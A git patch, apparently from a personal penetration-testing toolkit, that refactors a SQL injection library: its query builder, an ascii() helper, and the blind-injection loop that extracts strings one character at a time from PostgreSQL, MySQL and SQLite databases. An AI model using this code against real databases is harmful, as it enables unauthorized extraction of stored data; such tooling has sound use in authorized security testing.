From 58329993e2aaea7583dcc1f7d328dec3d2a40d85 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder <mail@romanh.de>
Date: Mon, 8 Dec 2025 13:28:17 +0100
Subject: [PATCH] SQLi improvement

---
 sqli.py | 31 ++++++++++++-------------------
 1 file changed, 12 insertions(+), 19 deletions(-)

diff --git a/sqli.py b/sqli.py
index e6029ea..1fd670b 100644
--- a/sqli.py
+++ b/sqli.py
@@ -6,12 +6,13 @@ class SQLi(ABC):
 
     @staticmethod
     def build_query(column: str|list, table=None, condition=None, offset=None, limit=1):
-        column = column if isinstance(column, str) else ",".join(column)
-        condition = "" if not condition else f" WHERE {condition}"
-        offset = "" if offset is None else f" OFFSET {offset}"
-        table = "" if not table else f" FROM {table}"
-        limit = "" if limit is None else f" LIMIT {limit}"
-        return f"SELECT {column}{table}{condition}{limit}{offset}"
+        query = "SELECT "
+        query += column if isinstance(column, str) else ",".join(column)
+        query += "" if not table else f" FROM {table}"
+        query += "" if not condition else f" WHERE {condition}"
+        query += "" if limit is None else f" LIMIT {limit}"
+        query += "" if offset is None or limit is None else f" OFFSET {offset}"
+        return query
 
     def extract_multiple_ints(self, column: str, table=None, condition=None, verbose=False):
         row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose)
@@ -38,9 +39,8 @@ class SQLi(ABC):
     def substring(self, what, offset: int, size: int):
         return f"substr({what},{offset},{size})"
 
-    @abstractmethod
-    def ascii(self):
-        pass
+    def ascii(self, what):
+        return f"ascii({what})"
 
     @abstractmethod
     def extract_int(self, column: str, table=None, condition=None, 
@@ -210,7 +210,7 @@ class BlindSQLi(SQLi, ABC):
         cur_str = ""
         while True:
             found = False
-            cur_column = self.ascii() + "(" + self.substring(column, len(cur_str) + 1, 1) + ")"
+            cur_column = self.ascii(self.substring(column, len(cur_str) + 1, 1))
             if charset:
                 query = self.build_query(cur_column, table, condition, offset)
                 for c in charset:
@@ -258,9 +258,6 @@ class PostgreSQLi(SQLi, ABC):
                                              f"table_schema='{schema}' AND table_name='{table}'",
                                              verbose=verbose)
 
-    def ascii(self):
-        return "ascii"
-
 class MySQLi(SQLi, ABC):
     def get_database_version(self, verbose=False):
         return self.extract_string("VERSION()", verbose=verbose)
@@ -280,10 +277,6 @@ class MySQLi(SQLi, ABC):
                                              f"table_schema='{schema}' AND table_name='{table}'",
                                              verbose=verbose)
 
-    def ascii(self):
-        return "ascii"
-
-
 class SQLitei(SQLi, ABC):
     def get_database_version(self, verbose=False):
         return self.extract_string("sqlite_version()", verbose=verbose)
@@ -302,5 +295,5 @@ class SQLitei(SQLi, ABC):
         # TODO: we could query the "sql" column and parse it using regex
         raise Exception("Not implemented!")
 
-    def ascii(self):
-        return "unicode"
+    def ascii(self, what):
+        return f"unicode({what})"